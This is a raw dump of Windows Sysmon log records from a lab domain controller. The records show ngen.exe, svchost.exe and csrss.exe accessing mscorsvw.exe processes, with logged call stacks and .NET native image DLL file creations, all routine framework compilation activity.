13:50:31.930{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9227-6005-0804-00000000A301}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:31.727{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9227-6005-0704-00000000A301}3260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.712{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9227-6005-0704-00000000A301}3260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:31.712{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9227-6005-0704-00000000A301}3260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:31.649{59A5CD1D-9227-6005-0604-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b7c-0\System.Activities.DurableInstancing.dll2021-01-18 13:50:31.649 10341000x80000000000000008262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:31.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9227-6005-0604-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.305{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9227-6005-0604-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:31.305{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9227-6005-0604-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:31.212{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9227-6005-0504-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.196{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9227-6005-0504-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:31.196{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9227-6005-0504-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:31.102{59A5CD1D-9225-6005-0404-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9e4-0\System.Activities.Core.Presentation.dll2021-01-18 13:50:31.102 10341000x80000000000000008276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:34.930{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922A-6005-0A04-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:34.915{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-922A-6005-0A04-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:34.915{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922A-6005-0A04-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:34.852{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922A-6005-0904-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:34.837{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-922A-6005-0904-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:34.837{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922A-6005-0904-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:34.649{59A5CD1D-9227-6005-0804-00000000A301}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1278-0\System.Activities.Presentation.dll2021-01-18 13:50:34.649 10341000x80000000000000008290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:35.555{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922B-6005-0E04-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.540{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-922B-6005-0E04-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:35.540{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922B-6005-0E04-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:35.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922B-6005-0D04-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.462{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-922B-6005-0D04-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:35.462{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922B-6005-0D04-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 